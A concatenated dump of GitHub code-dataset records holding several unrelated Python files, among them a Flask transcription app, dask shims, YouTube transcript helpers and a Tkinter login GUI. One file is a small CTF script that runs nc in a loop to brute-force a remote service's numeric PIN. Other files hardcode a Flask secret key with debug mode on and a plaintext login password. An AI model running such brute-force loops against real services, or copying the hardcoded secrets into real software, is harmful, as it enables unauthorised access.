self.update_button_states()\n\n def on_next_clicked(self, button):\n if self.current_page < 2:\n self.current_page += 1\n self.stack.set_visible_child_name(f\"page{self.current_page}\")\n self.update_button_states()\n\n def on_confirm_clicked(self, button):\n self.current_page = 2\n self.stack.set_visible_child_name(f\"page{self.current_page}\")\n self.update_button_states()\n\n def update_button_states(self):\n self.back_button.set_sensitive(self.current_page > 1)\n self.next_button.set_sensitive(self.current_page < 2)\n\nwindow = MyApp()\nwindow.show_all()\nGtk.main()","repo_name":"arunnats/Hardening-GUI-for-Ubuntu-Debian","sub_path":"pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28406029603","text":"from flask import Flask, render_template, request, url_for, redirect, render_template_string\nfrom flask_cors import CORS\nfrom app import SpeechText\nfrom pydub import AudioSegment\nfrom whisper import load_model, transcribe\nimport torch, io, os\n\napp = Flask(__name__)\napp.secret_key = 'John The Ripper'\nYOUTUBE_LINK = ''\nVALID_INVALID_CHECK = False\nAUDIO_FILE_PATH = ''\nAUDIO_FILE_NAME_ = 'audioFileFromUser.mp3'\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/', methods=['GET', 'POST'])\ndef currentTemp():\n if request.method == 'POST':\n # Check for valid input from user in link field or file input field \n if not (request.form.get('linkToVideo') or request.files.get('file')):\n return redirect(url_for('home')) \n else:\n if request.form.get('linkToVideo'): # if user entered link \n # checking whether the url given by the user is youtube video link or not\n YOUTUBE_LINK = request.form.get('linkToVideo')\n VALID_INVALID_CHECK = SpeechText.is_valid_youtube_url(YOUTUBE_LINK)\n # linkUrl = request.form['linkToVideo']\n if not VALID_INVALID_CHECK:\n return redirect(url_for('home'))\n \n # Now let's download the youtube video from the link specified by the user\n AUDIO_FILE_PATH = SpeechText.youtubeVideoToAudioDownload(YOUTUBE_LINK)\n \n # speech conversion\n elif request.files.get('file'): # if user uploaded an audio file\n \n wavFile = request.files['file']\n AUDIO_FILE_PATH = os.path.join(\".\\\\audio_files\", AUDIO_FILE_NAME_)\n filename = wavFile.filename \n wavFile.save(AUDIO_FILE_PATH)\n \n try:\n lang = request.form.get('val')\n convertedText = SpeechText._TextFromSpeech(AUDIO_FILE_PATH, lang)\n if convertedText[0] != False: \n return redirect(url_for('home'))\n return render_template('index.html', convertedText=convertedText[1]) # Print the output \n except Exception as e:\n pass\n return \"Error\"\n\nif __name__ == '__main__':\n app.run(port=5000, debug=True)\n","repo_name":"Tweaks016/speech-to-text-whisper","sub_path":"mainApp.py","file_name":"mainApp.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41774554945","text":"def writeToFile(*, blocked, timedOut, badAuth, commits):\r\n # Define the HTML document\r\n html = \"\"\"\\\r\n
\r\n

Device Backup

\r\n

If a host appears under \"Blocked\", this host actively denied an SSH connection. Check firewall policies and local SSH access rules.

\r\n

If a host appears under \"Timed Out\", this host simply timed out and was either dropped by a firewall policy, or simply offline at the time of execution.

\r\n

If a host appears under \"Authentication Failed\", the backup job does not have the correct credentials for the device.

\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \"\"\"\r\n\r\n for i in range(max(len(blocked), len(timedOut), len(badAuth))):\r\n try:\r\n html += \"\"\r\n html += \"\" \r\n html += \"\" \r\n except IndexError:\r\n html += \"\"\r\n if i >= len(blocked):\r\n if i < len(timedOut) and i < len(badAuth):\r\n html += \"\"\r\n html += \"\"\r\n elif i < len(timedOut) and i >= len(badAuth):\r\n html += \"\"\r\n html += \"\"\r\n elif i >= len(timedOut) and i < len(badAuth):\r\n html += \"\"\r\n html += \"\"\r\n elif i >= len(timedOut):\r\n if i < len(badAuth):\r\n html += \"\"\r\n else:\r\n html += \"\"\r\n finally:\r\n html += \"\"\r\n\r\n html += \"\"\"\\\r\n
\r\n Blocked\r\n \r\n Timed Out\r\n \r\n Authentication Failed\r\n
\" + blocked[i] + \"\" + timedOut[i] + \"\" + badAuth[i] + \" \" + timedOut[i] + \"\" + badAuth[i] + \"\" + timedOut[i] + \"  \" + badAuth[i] + \"\" + badAuth[i] + \" 
\r\n

Backup Directory Git Commit Status

\r\n

Routers

\r\n \"\"\"\r\n html += \"

\" + str(commits['Routers']) + \"

\"\r\n html += \"

Switches

\"\r\n html += \"

\" + str(commits['Switches']) + \"

\"\r\n html += \"

Firewalls

\"\r\n html += \"

\" + str(commits['Firewalls']) + \"

\"\r\n html += \"

Voice

\"\r\n html += \"

\" + str(commits['Voice']) + \"

\"\r\n html += \"

WLCs

\"\r\n html += \"

\" + str(commits['WLCs']) + \"

\"\r\n\r\n with open(\"backupResults.html\", \"w\") as backupResults:\r\n backupResults.write(html)","repo_name":"bradley-rose/Nornir-DeviceBackup","sub_path":"Functions/deviceBackupLog.py","file_name":"deviceBackupLog.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9120162855","text":"from distutils.version import LooseVersion\n\nimport dask.array as da\nimport numpy as np\nfrom dask import __version__ as dask_version\n\ntry:\n from dask.array import isin\nexcept ImportError: # pragma: no cover\n # Copied from dask v0.17.3.\n # Used under the terms of Dask's license, see licenses/DASK_LICENSE.\n\n def _isin_kernel(element, test_elements, assume_unique=False):\n values = np.in1d(element.ravel(), test_elements,\n assume_unique=assume_unique)\n return values.reshape(element.shape + (1,) * test_elements.ndim)\n\n def isin(element, test_elements, assume_unique=False, invert=False):\n element = da.asarray(element)\n test_elements = da.asarray(test_elements)\n element_axes = tuple(range(element.ndim))\n test_axes = tuple(i + element.ndim for i in range(test_elements.ndim))\n mapped = da.atop(_isin_kernel, element_axes + test_axes,\n element, element_axes,\n test_elements, test_axes,\n adjust_chunks={axis: lambda _: 1\n for axis in test_axes},\n dtype=bool,\n assume_unique=assume_unique)\n result = mapped.any(axis=test_axes)\n if invert:\n result = ~result\n return result\n\n\nif LooseVersion(dask_version) > LooseVersion('0.19.2'):\n gradient = da.gradient\n\nelse: # pragma: no cover\n # Copied from dask v0.19.2\n # Used under the terms of Dask's license, see licenses/DASK_LICENSE.\n import math\n from numbers import Integral, Real\n\n try:\n AxisError = np.AxisError\n except AttributeError:\n try:\n np.array([0]).sum(axis=5)\n except Exception as e:\n AxisError = type(e)\n\n def validate_axis(axis, ndim):\n \"\"\" Validate an input to axis= keywords \"\"\"\n if isinstance(axis, (tuple, list)):\n return tuple(validate_axis(ax, ndim) for ax in axis)\n if not isinstance(axis, Integral):\n raise TypeError(\"Axis value must be an integer, got %s\" % axis)\n if axis < -ndim or axis >= ndim:\n raise AxisError(\"Axis %d is out of bounds for array of dimension \"\n \"%d\" % (axis, ndim))\n if axis < 0:\n axis += ndim\n return axis\n\n def _gradient_kernel(x, block_id, coord, axis, array_locs, grad_kwargs):\n \"\"\"\n x: nd-array\n array of one block\n coord: 1d-array or scalar\n coordinate along which the gradient is computed.\n axis: int\n axis along which the gradient is computed\n array_locs:\n actual location along axis. None if coordinate is scalar\n grad_kwargs:\n keyword to be passed to np.gradient\n \"\"\"\n block_loc = block_id[axis]\n if array_locs is not None:\n coord = coord[array_locs[0][block_loc]:array_locs[1][block_loc]]\n grad = np.gradient(x, coord, axis=axis, **grad_kwargs)\n return grad\n\n def gradient(f, *varargs, **kwargs):\n f = da.asarray(f)\n\n kwargs[\"edge_order\"] = math.ceil(kwargs.get(\"edge_order\", 1))\n if kwargs[\"edge_order\"] > 2:\n raise ValueError(\"edge_order must be less than or equal to 2.\")\n\n drop_result_list = False\n axis = kwargs.pop(\"axis\", None)\n if axis is None:\n axis = tuple(range(f.ndim))\n elif isinstance(axis, Integral):\n drop_result_list = True\n axis = (axis,)\n\n axis = validate_axis(axis, f.ndim)\n\n if len(axis) != len(set(axis)):\n raise ValueError(\"duplicate axes not allowed\")\n\n axis = tuple(ax % f.ndim for ax in axis)\n\n if varargs == ():\n varargs = (1,)\n if len(varargs) == 1:\n varargs = len(axis) * varargs\n if len(varargs) != len(axis):\n raise TypeError(\n \"Spacing must either be a single scalar, or a scalar / \"\n \"1d-array per axis\"\n )\n\n if issubclass(f.dtype.type, (np.bool8, Integral)):\n f = f.astype(float)\n elif issubclass(f.dtype.type, Real) and f.dtype.itemsize < 4:\n f = f.astype(float)\n\n results = []\n for i, ax in enumerate(axis):\n for c in f.chunks[ax]:\n if np.min(c) < kwargs[\"edge_order\"] + 1:\n raise ValueError(\n 'Chunk size must be larger than edge_order + 1. '\n 'Minimum chunk for aixs {} is {}. Rechunk to '\n 'proceed.'.format(np.min(c), ax))\n\n if np.isscalar(varargs[i]):\n array_locs = None\n else:\n if isinstance(varargs[i], da.Array):\n raise NotImplementedError(\n 'dask array coordinated is not supported.')\n # coordinate position for each block taking overlap into\n # account\n chunk = np.array(f.chunks[ax])\n array_loc_stop = np.cumsum(chunk) + 1\n array_loc_start = array_loc_stop - chunk - 2\n array_loc_stop[-1] -= 1\n array_loc_start[0] = 0\n array_locs = (array_loc_start, array_loc_stop)\n\n results.append(f.map_overlap(\n _gradient_kernel,\n dtype=f.dtype,\n depth={j: 1 if j == ax else 0 for j in range(f.ndim)},\n boundary=\"none\",\n coord=varargs[i],\n axis=ax,\n array_locs=array_locs,\n grad_kwargs=kwargs,\n ))\n\n if drop_result_list:\n results = results[0]\n\n return results\n","repo_name":"timothyyu/ml_monorepo","sub_path":"xarray/xarray/core/dask_array_compat.py","file_name":"dask_array_compat.py","file_ext":"py","file_size_in_byte":5767,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"21"} +{"seq_id":"16847911469","text":"from dotenv import load_dotenv\nfrom typing import List\nimport numpy as np\nimport re\nfrom youtube_transcript_api import YouTubeTranscriptApi\n\nfrom langchain.output_parsers import PydanticOutputParser\nfrom langchain.prompts import PromptTemplate\nfrom langchain.pydantic_v1 import BaseModel, Field\n\nfrom llama_index.llms import OpenAI\n\nload_dotenv()\n\n\ndef convert_timestamps_to_intervals(timestamps):\n \"\"\"\n Convert a list of timestamps and descriptions into a list of intervals.\n\n Args:\n timestamps (list): A list of strings in the format \"HH:MM:SS description\".\n\n Returns:\n list: A list of dictionaries, where each dictionary represents an interval\n and has the keys \"start\", \"end\", and \"desc\". The \"start\" and \"end\" values\n are in seconds, and the \"desc\" value is a string describing the interval.\n \"\"\"\n\n def convert_to_seconds(timestamp):\n num_splits = len(timestamp.split(\":\"))\n if num_splits == 2:\n timestamp = re.search(r\"\\d{1,2}:\\d{2}\", timestamp).group(0)\n m, s = map(int, timestamp.split(\":\"))\n h = 0\n elif num_splits == 3:\n timestamp = re.search(r\"\\d{1,2}:\\d{2}:\\d{2}\", timestamp).group(0)\n h, m, s = map(int, timestamp.split(\":\"))\n else:\n try:\n h, m, s = map(int, timestamp.split(\":\")[-3:])\n except:\n timestamp = re.search(r\"\\d{2}:\\d{2}:\\d{2}\", timestamp).group(0)\n h, m, s = map(int, timestamp.split(\":\"))\n return h * 3600 + m * 60 + s\n\n def split_timestamps(description):\n # Find all timestamps in the description\n timestamps = re.findall(r\"\\d{2}:\\d{2}:\\d{2}\", description)\n\n # Split the description at each timestamp\n parts = re.split(r\"\\d{2}:\\d{2}:\\d{2}\", description)\n parts = [part.strip() for part in parts if part.strip()]\n\n return list(zip(timestamps, parts))\n\n intervals = []\n for i, entry in enumerate(timestamps):\n parts = entry.split(\" \", 1)\n initial_timestamp = parts[0]\n description = parts[1]\n\n # Handle multiple timestamps within a single description\n if len(re.findall(r\"\\d{2}:\\d{2}:\\d{2}\", description)) > 0:\n split_entries = split_timestamps(description)\n for j, (ts, desc) in enumerate(split_entries):\n start_seconds = convert_to_seconds(ts)\n end_seconds = (\n convert_to_seconds(timestamps[i + 1].split(\" \")[0])\n if i + 1 < len(timestamps)\n else None\n )\n intervals.append(\n {\n \"start\": float(start_seconds),\n \"end\": float(end_seconds) if end_seconds else \"end\",\n \"desc\": desc,\n }\n )\n else:\n start_seconds = convert_to_seconds(initial_timestamp)\n end_seconds = (\n convert_to_seconds(timestamps[i + 1].split(\" \")[0])\n if i + 1 < len(timestamps)\n else None\n )\n intervals.append(\n {\n \"start\": float(start_seconds),\n \"end\": float(end_seconds) if end_seconds else \"end\",\n \"desc\": description.strip(),\n }\n )\n\n intervals = [interval for interval in intervals if interval[\"end\"] != \"end\"]\n intervals = [\n interval for interval in intervals if \"sponsor\" not in interval[\"desc\"].lower()\n ]\n\n return intervals\n\n\ndef convert_transcript_to_dict(url):\n \"\"\"\n Convert YouTube video transcript to a dictionary.\n\n Args:\n url (str): The URL of the YouTube video.\n\n Returns:\n dict: A dictionary where the keys are the timestamps of each transcript\n entry and the values are the corresponding transcript text.\n \"\"\"\n match = re.search(r\"v=([^&]+)\", url)\n video_id = match.group(1) if match else url.split(\"/\")[-1]\n # video_id = url.split(\"/\")[-1]\n data = YouTubeTranscriptApi.get_transcript(video_id, languages=[\"en-US\", \"en\"])\n\n result = {}\n for entry in data:\n if \"text\" in entry:\n result[entry[\"start\"]] = entry[\"text\"]\n return result\n\n\ndef extract_transcript_from_timeframe(data_dict, start, end):\n \"\"\"\n Extracts the transcript of a given timeframe from a dictionary of YouTube video transcripts.\n\n Args:\n data_dict (dict): A dictionary containing the YouTube video transcript data.\n start (float): The start time of the desired transcript in seconds.\n end (float): The end time of the desired transcript in seconds.\n\n Returns:\n str: The transcript of the given timeframe.\n \"\"\"\n\n def clean_test(text):\n text = text.replace(\"\\n\", \" \")\n text = re.sub(r\"\\s+\", \" \", text)\n text = text.replace(\" -\", \"-\")\n text = text.strip()\n return text\n\n keys = np.array(list(data_dict.keys()))\n closest_start = np.argmin(np.abs(keys - start))\n closest_end = np.argmin(np.abs(keys - end))\n timestamps = keys[closest_start : closest_end + 1]\n\n transcript = \"\"\n for t in timestamps:\n text = clean_test(data_dict[t])\n transcript += text + \" \"\n\n transcript = transcript.strip()\n\n return transcript\n\n\ndef generate_timestamps_from_yt_transcript(yt_transcript):\n \"\"\"\n Generate timestamps from a YouTube transcript.\n\n Args:\n yt_transcript (dict): The YouTube transcript.\n\n Returns:\n List[dict]: A list of dictionaries containing the start time, end time, description, and transcript for each timestamp.\n \"\"\"\n\n class Transcript(BaseModel):\n \"\"\"Data model for transcript.\"\"\"\n\n start: float = Field(description=\"Start time of the timestamp in seconds\")\n end: float = Field(description=\"End time of the timestamp in seconds\")\n desc: str = Field(description=\"Short description of the timestamp\")\n # transcript: str\n\n class Transcripts(BaseModel):\n \"\"\"Data model for transcripts.\"\"\"\n\n transcripts: List[Transcript]\n\n MODEL_NAME = \"gpt-4-1106-preview\"\n TEMPERATURE = 0.1\n GENERATION_RETRIES = 3\n PROMPT_TEMPLATE_STR = \"\"\"\\\n Given the Youtube Transcript below, read it till the very end, pick up the main points and create timestamps.\n All transcript time should be covered.\n Each timestamp should be more than 30 seconds long.\n\n Youtube Transcript:\n {yt_transcript}\n\n {format_instructions}\n \"\"\"\n\n model = OpenAI(model=MODEL_NAME, temperature=TEMPERATURE)\n\n parser = PydanticOutputParser(pydantic_object=Transcripts)\n\n prompt = PromptTemplate(\n template=PROMPT_TEMPLATE_STR,\n input_variables=[\"yt_transcript\"],\n partial_variables={\"format_instructions\": parser.get_format_instructions()},\n )\n\n _input = prompt.format_prompt(yt_transcript=str(yt_transcript))\n\n # Retry if there is an error\n for _ in range(GENERATION_RETRIES):\n try:\n output = model.complete(_input.to_string())\n output = output.text\n json_output = parser.parse(output)\n str_err = None\n except Exception as e:\n str_err = str(e)\n print(str_err)\n pass\n\n if not str_err:\n break\n\n transcripts = []\n\n for timestamp in json_output.transcripts:\n start = timestamp.start\n end = timestamp.end\n desc = timestamp.desc\n transcript = extract_transcript_from_timeframe(\n data_dict=yt_transcript, start=start, end=end\n )\n transcript = transcript.strip()\n interval = {\"start\": start, \"end\": end, \"desc\": desc, \"transcript\": transcript}\n transcripts.append(interval)\n\n return transcripts\n","repo_name":"leonseet/andrew_huberman_chatbot","sub_path":"libs/data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":7796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29141300322","text":"import pickle\nimport json\nimport os, glob\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pdb\n\n# data_name = ['initial', 'half', 'one', 'two', 'sparse']\n# legend_name = {\n# \t'initial':\t'Initialization',\n# \t'half'\t: \t'0.5-norm',\n# \t'one'\t: \t'1-norm',\n# \t'two'\t: \t'2-norm',\n# \t'sparse':\t'AUSC',\n# }\n\ndata_name = ['one_new','one_accommodation']\nlegend_name = {\n\t'one_new'\t:\t'1-norm',\n\t'one_accommodation':\t'Accommodation'\n}\n\ndata = {}\nfile_dir = \"./test_results/pyConfLensFlowNetFast_ext/\"\nfor name in data_name:\n\twith open(file_dir+name+'.pickle','rb') as f:\n\t\tdata[name] = pickle.load(f)\n\n# fig = plt.figure()\t\n# # draw the sparsification curve\n# ax1 = fig.add_subplot(3,2,1, title=\"Sparsification Curve\")\n# legends = []\n# for name in data_name:\n# \t# get the data\n# \tZ_flat = data[name]['Z_flat'].flatten()\n# \tZ_gt_flat = data[name]['Z_gt_flat'].flatten()\n# \tconf_flat = data[name]['conf_flat'].flatten()\n\n# \t# data is too much, sample them\n# \tidx = ((np.random.rand(500000)*len(Z_flat)).astype(np.int),)\n# \tZ_flat = Z_flat[idx]\n# \tZ_gt_flat = Z_gt_flat[idx]\n# \tconf_flat = conf_flat[idx]\n\t\n# \terr = np.abs(Z_flat - Z_gt_flat).astype(np.float64)\n\n# \t# sort the conf_flat\n# \terr_sorted = err[np.argsort(conf_flat)]\n# \tsparse = np.arange(len(err))/len(err)\n# \tnum = len(err) - np.arange(len(err))\n\n# \tfor i in range(len(err)-1,0,-1):\n# \t\terr_sorted[i-1] += err_sorted[i]\n# \terr_sorted /= num\n\n# \t# draw a fig that shows the average error with a certain sparsication\n# \tbin_nums = 1000\n# \tstep = np.linspace(0, len(err_sorted)-1, bin_nums, True).astype(np.int)\n\t\n# \terr_show = err_sorted[step]\n# \tsparse_show = sparse[step]\n\n# \t# compute the AUC\n# \tarea = np.mean(err_sorted)\n\n# \t# draw the figure\t\n# \tline, = ax1.plot(sparse_show, err_show, '-', label=legend_name[name])\n# \tlegends.append(line)\n\n# plt.legend(handles=legends)\n# ax1.set_xlabel('Sparsification')\n# ax1.set_ylabel('Average error')\n# plt.ylim((0.0,0.14))\n\n\n# # draw the AUC vs. depth\n# i = 1\n# for name in data_name:\n# \ti += 1\n# \tax2 = fig.add_subplot(3,2,i, title=legend_name[name])\n# \t# get the data\n# \tZ_gt_flat = data[name]['Z_gt_flat'][0,:] + 1.38\n# \tAUC = data[name]['AUC']\n# \tax2.plot(Z_gt_flat, AUC, '.')\n# \tax2.set_xlabel('True depth (m)')\n# \tax2.set_ylabel('AUSC of each prediction')\n# \tplt.ylim((0,0.4))\n# \tplt.xlim((0.25,1.2))\n\n# draw average AUC vs. depth\ni = 1\nlegends = []\nfig = plt.figure()\nax3 = fig.add_subplot(1,1,i)\nfor name in data_name:\n\tZ_gt_flat = data[name]['Z_gt_flat'][0,:] + 1.38\n\tAUC = data[name]['AUC']\n\tZ_gt_flat_uni = np.unique(Z_gt_flat)\n\tAUC_mean = []\n\tfor Z_gt_elem in Z_gt_flat_uni:\n\t\tAUC_mean.append(\n\t\t\tnp.mean(\n\t\t\t\tAUC[np.where(Z_gt_flat==Z_gt_elem)]\n\t\t\t)\n\t\t)\n\tline, = ax3.plot(Z_gt_flat_uni, AUC_mean, '.', label=legend_name[name])\n\tlegends.append(line)\n\tax3.set_xlabel('True depth (m)')\n\tax3.set_ylabel('Average AUSC (m)')\n\tplt.ylim((0,0.3))\n\tplt.xlim((0.26,1.12))\n\n# plt.legend(handles=legends)\nax3.plot([0,10],[0.05,0.05],'k')\nplt.show()","repo_name":"guoqi1123/focaltrack","sub_path":"extra/testing_show.py","file_name":"testing_show.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"18959539950","text":"import asyncio\n\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlalchemy.ext.asyncio import create_async_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nimport config\n\nDB_URL = f'postgresql+asyncpg://{config.DB_USER}:{config.DB_PASSWORD}@{config.DB_HOST}:{config.DB_PORT}/{config.DB_NAME}'\nasync_engine = create_async_engine(DB_URL, echo=True)\n\nBase = declarative_base()\nasync_session = sessionmaker(\n async_engine, class_=AsyncSession, expire_on_commit=False\n)\n\n\n# Dependency\nasync def get_session() -> AsyncSession:\n async with async_session() as session:\n yield session\n\n\nasync def init_models():\n async with async_engine.begin() as conn:\n await conn.run_sync(Base.metadata.drop_all)\n await conn.run_sync(Base.metadata.create_all)\n\n\nif __name__ == '__main__':\n asyncio.run(init_models())\n","repo_name":"IvaRude/FastAPI-Example","sub_path":"src/db/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28758516014","text":"import subprocess\n\nip = \"0.cloud.chals.io\"\nport = 34293\nfor i in range(10000):\n # run nc command\n p = subprocess.Popen([\"nc\", ip, str(port)], stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n # send i as input\n p.stdin.write(str(i))\n # get output\n output = p.stdout.read()","repo_name":"Boomer-Sooner-PC/Competitive-Programming","sub_path":"Practice/PicoCTF/valentine.py","file_name":"valentine.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40626096613","text":"x = 10\ny = \"10\"\nz = 10.1\n\nsum1 = x + x\nsum2 = y + y\n\nprint (sum1, sum2)\n\nprint (type(x), type(y), type(z))\n# --------------------------------------\n\nx = dir(list) # List all the properties and methods\n\nfor i in x:\n print (i)\n\n# use a help (instruction) ot get help in rpl\n\n\n","repo_name":"hdavidlp/megacourse","sub_path":"section 1_3/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73035551413","text":"import pytest\nfrom tests.utils import Command\nfrom thefuck.rules.heroku_not_command import match, get_new_command\n\n\ndef suggest_stderr(cmd):\n return ''' ! `{}` is not a heroku command.\n ! Perhaps you meant `logs`, `pg`.\n ! See `heroku help` for a list of available commands.'''.format(cmd)\n\n\nno_suggest_stderr = ''' ! `aaaaa` is not a heroku command.\n ! See `heroku help` for a list of available commands.'''\n\n\n@pytest.mark.parametrize('cmd', ['log', 'pge'])\ndef test_match(cmd):\n assert match(\n Command('heroku {}'.format(cmd), stderr=suggest_stderr(cmd)))\n\n\n@pytest.mark.parametrize('script, stderr', [\n ('cat log', suggest_stderr('log')),\n ('heroku aaa', no_suggest_stderr)])\ndef test_not_match(script, stderr):\n assert not match(Command(script, stderr=stderr))\n\n\n@pytest.mark.parametrize('cmd, result', [\n ('log', ['heroku logs', 'heroku pg']),\n ('pge', ['heroku pg', 'heroku logs'])])\ndef test_get_new_command(cmd, result):\n command = Command('heroku {}'.format(cmd), stderr=suggest_stderr(cmd))\n assert get_new_command(command) == result\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/nvbn_thefuck/thefuck-master/tests/rules/test_heroku_not_command.py","file_name":"test_heroku_not_command.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"16247046166","text":"from logging import root\nimport tkinter as tk\nfrom tkinter import ttk, messagebox\nfrom tkinter.font import BOLD\nimport util.generic as utl\nfrom PIL import ImageTk, Image\nfrom tkinter import Image, Tk, Button, Entry, Label, ttk, PhotoImage\nfrom tkinter import Frame\nimport webbrowser\nfrom cProfile import label\nfrom os import stat\nfrom used.generic2 import leer_imagen\nfrom tkinter import *\nfrom tkinter import ttk\n\nclass Liot:\n \n def verificar(self):\n usu = self.usuario.get()\n password = self.password.get() \n if(usu == \"User\" and password == \"1234\") :\n self.ventana.destroy()\n AppLiot()\n else:\n messagebox.showerror(message=\"La contraseña o el usuario no son correctos\",title=\"Error\") \n \n def __init__(self): \n self.ventana = tk.Tk() \n self.ventana.title('Inicio de sesión')\n self.ventana.geometry('800x500')\n self.ventana.config(bg='#fcfcfc')\n self.ventana.resizable(width=0, height=0) \n utl.centrar_ventana(self.ventana,800,500)\n \n logo =utl.leer_imagen(\"./imagenes/logo.png\", (450, 450))\n # frame_logo\n frame_logo = tk.Frame(self.ventana, bd=0, width=300, relief=tk.SOLID, padx=10, pady=10,bg='white')\n frame_logo.pack(side=\"left\",expand=tk.YES,fill=tk.BOTH)\n label = tk.Label( frame_logo, image=logo,bg='white' )\n label.place(x=0,y=0,relwidth=1, relheight=1)\n \n #frame_form\n frame_form = tk.Frame(self.ventana, bd=0, relief=tk.SOLID, bg='#fcfcfc')\n frame_form.pack(side=\"right\",expand=tk.YES,fill=tk.BOTH)\n #frame_form\n \n #frame_form_top\n frame_form_top = tk.Frame(frame_form,height = 50, bd=0, relief=tk.SOLID,bg='white')\n frame_form_top.pack(side=\"top\",fill=tk.X)\n title = tk.Label(frame_form_top, text=\"Inicio de sesión\",font=('Open Sans Bold', 30), fg=\"#EB5066\",bg='#fcfcfc',pady=50)\n title.pack(expand=tk.YES,fill=tk.BOTH)\n #end frame_form_top\n\n #frame_form_fill\n frame_form_fill = tk.Frame(frame_form,height = 50, bd=0, relief=tk.SOLID,bg='#fcfcfc')\n frame_form_fill.pack(side=\"bottom\",expand=tk.YES,fill=tk.BOTH)\n\n etiqueta_usuario = tk.Label(frame_form_fill, text=\"Usuario\", font=('Open Sans', 14) ,fg=\"#666a88\",bg='#fcfcfc', anchor=\"w\")\n etiqueta_usuario.pack(fill=tk.X, padx=20,pady=5)\n self.usuario = ttk.Entry(frame_form_fill, font=('Open Sans', 14))\n self.usuario.pack(fill=tk.X, padx=20,pady=10)\n\n etiqueta_password = tk.Label(frame_form_fill, text=\"Contraseña\", font=('Open Sans', 14),fg=\"#666a88\",bg='#fcfcfc' , anchor=\"w\")\n etiqueta_password.pack(fill=tk.X, padx=20,pady=5)\n self.password = ttk.Entry(frame_form_fill, font=('Open Sans', 14))\n self.password.pack(fill=tk.X, padx=20,pady=10)\n self.password.config(show=\"*\")\n\n inicio = tk.Button(frame_form_fill,text=\"Iniciar sesión\",font=('Open Sans', 15,BOLD),bg='#EB5066', bd=0,fg=\"#fff\",command=self.verificar)\n inicio.pack(fill=tk.X, padx=20,pady=20) \n inicio.bind(\"\", (lambda event: self.verificar()))\n #end frame_form_fill\n self.ventana.mainloop()\n \nif __name__ == \"__main__\":\n Liot()\n\nclass AppLiot():\n \n class Ventana(Frame):\n def __init__(self, master, *args):\n super().__init__( master,*args)\n self.menu = True\n self.color = True\n\n self.frame_inicio = Frame(self.master, bg='white', width=50, height=50)\n self.frame_inicio.grid_propagate(0)\n self.frame_inicio.grid(column=0, row = 0, sticky='nsew')\n self.frame_menu = Frame(self.master, bg='white', width = 50)\n self.frame_menu.grid_propagate(0)\n self.frame_menu.grid(column=0, row = 1, sticky='nsew')\n self.frame_principal = Frame(self.master, bg='white')\n self.frame_principal.grid(column=1, row=1, sticky='nsew')\n self.master.columnconfigure(1, weight=1)\n self.master.rowconfigure(1, weight=1)\n self.frame_principal.columnconfigure(0, weight=1)\n self.frame_principal.rowconfigure(0, weight=1)\n self.widgets()\t\t\n\n def pantalla_inicial(self):\n self.paginas.select([self.frame_uno])\n #self.imagen_lectura = PhotoImage(file = 'letras.png')\n #Button(self.frame_uno, image= self.imagen_lectura, command= self.pantalla_inicial).place(x=70,y=325)\n\n def pantalla_reglas(self):\n self.paginas.select([self.frame_dos])\n self.frame_dos.columnconfigure(0, weight=1)\n self.frame_dos.columnconfigure(1, weight=1)\n self.frame_dos.rowconfigure(2, weight=1)\n Button(self.frame_dos ,image= self.ReglaB, command = self.reglaB ,bg='white').place(x=20,y= 10)\n Button(self.frame_dos ,image= self.ReglaC, command = self.reglaC, bg='white',).place(x=320,y= 10)\n Button(self.frame_dos ,image= self.ReglaH, command = self.reglaH, bg='white').place(x=620,y= 10)\n Button(self.frame_dos ,image= self.ReglaJ, command = self.reglaJ, bg='white').place(x=920,y= 10)\n Button(self.frame_dos ,image= self.ReglaS, command = self.reglaS, bg='white').place(x=20,y= 320)\n Button(self.frame_dos ,image= self.ReglaV, command = self.reglaV, bg='white').place(x=320,y= 320)\n Button(self.frame_dos ,image= self.ReglaY, bg='white',command= self.pantalla_reglaY).place(x=620,y= 320)\n Button(self.frame_dos ,image= self.Reglapunt, command = self.reglaPC, bg='white').place(x=920,y= 320)\n #Button(self.frame_dos ,image= self.Reglacoma, bg='white').place(x=660,y= 320)\n\n def reglaB(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFMEynvHyg/ZZ86wNv6te1w9Lquf-8L4g/view?utm_content=DAFMEynvHyg&utm_campaign=designshare&utm_medium=link&utm_source=homepage_design_menu\")\n################################################## \n def reglaC(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFMQBWYkMQ/GI0uwiQMhod8ch84rKCVvA/view?utm_content=DAFMQBWYkMQ&utm_campaign=designshare&utm_medium=link&utm_source=homepage_design_menu\")\n################################################## \n def reglaV(self):\n 